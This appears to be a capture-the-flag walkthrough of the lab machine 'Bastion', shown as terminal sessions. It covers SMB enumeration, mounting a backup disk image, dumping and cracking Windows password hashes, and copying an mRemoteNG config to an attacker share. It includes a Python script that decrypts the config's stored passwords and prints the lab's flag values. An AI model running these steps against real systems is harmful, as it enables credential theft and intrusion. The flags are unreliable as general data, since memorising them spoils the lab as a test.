$ nmap -p- -T4 -A 10.10.10.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 08:34 EDT
Nmap scan report for 10.10.10.134
Host is up (0.028s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -27m31s, deviation: 1h09m14s, median: 12m26s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-15T14:47:56+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-15T12:47:53
|_ start_date: 2021-07-15T05:16:36
$ smbmap -H 10.10.10.134 -u df
[+] Guest session IP: 10.10.10.134:445 Name: 10.10.10.134
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\SVUGOZCMTY, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
$ smbclient -N -L 10.10.10.134
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
$ smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
7735807 blocks of size 4096. 2762667 blocks available
smb: \> get note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
$ sudo mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
kali@kali:/mnt$ sudo mkdir vhd
kali@kali:/mnt$ sudo guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
kali@kali:/mnt$
kali@kali:/mnt$ sudo su
root@kali:/mnt# cd vhd
root@kali:/mnt/vhd# ls
'$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
root@kali:/mnt/vhd/Windows/System32/config# samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
# secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
https://crackstation.net/
$ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
(*disabled* Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2021-07-15 14:16) 3.389g/s 15924Kp/s 15924Kc/s 15932KC/s buresres..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
$ ssh L4mpje@10.10.10.134
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
l4mpje@BASTION C:\Users\L4mpje\Desktop>
mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
confCons.xml
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
kali@kali:~/0.htb/machines/Bastion134$ impacket-smbserver test ~/0.htb/machines/Bastion134
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>copy confCons.xml \\10.10.14.56\test\
https://github.com/kmahyyg/mremoteng-decrypt/releases
#!/usr/bin/env python3
import base64
import hashlib
import re
import sys
from Cryptodome.Cipher import AES
if len(sys.argv) != 2:
print(f"[-] Usage: {sys.argv[0]} [confCons.xml]")
sys.exit()
try:
with open(sys.argv[1], 'r') as f:
conf = f.read()
except FileNotFoundError:
print(f"[-] Unable to open {sys.argv[1]}")
sys.exit()
mode = re.findall('BlockCipherMode="(\w+)"', conf)
if len(mode) !=1:
print("[-] Warning - No BlockCipherMode detected")
elif mode[0] != 'GCM':
print(f"[-] Warning - This script is for AES GCM Mode. {mode} detected")
nodes = re.findall('<Node .+/>', conf)
if len(nodes) > 0:
print(f"[+] Found nodes: {len(nodes)}\n")
else:
print("[-] Found no nodes")
for node in nodes:
user = re.findall(' Username="(\w*)"', node)[0]
enc = base64.b64decode(re.findall(' Password="([^ ]+)"', node)[0])
salt = enc[:16]
nonce = enc[16:32]
cipher = enc[32:-16]
tag = enc[-16:]
key = hashlib.pbkdf2_hmac("sha1", b"mR3m", salt, 1000, dklen=32)
aes = AES.new(key, AES.MODE_GCM, nonce=nonce)
aes.update(salt)
password = aes.decrypt_and_verify(cipher, tag).decode()
print(f"Username: {user}\nPassword: {password}\n")
$ python3 getpw.py confCons.xml
[+] Found nodes: 2
Username: Administrator
Password: thXLHM96BeKL0ER2
Username: L4mpje
Password: bureaulampje
kali@kali:~/0.htb/machines/Bastion134$
kali@kali:~/0.htb/machines/Bastion134$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
958850b91811676ed6620a9c430e65c8
administrator@BASTION C:\Users\Administrator>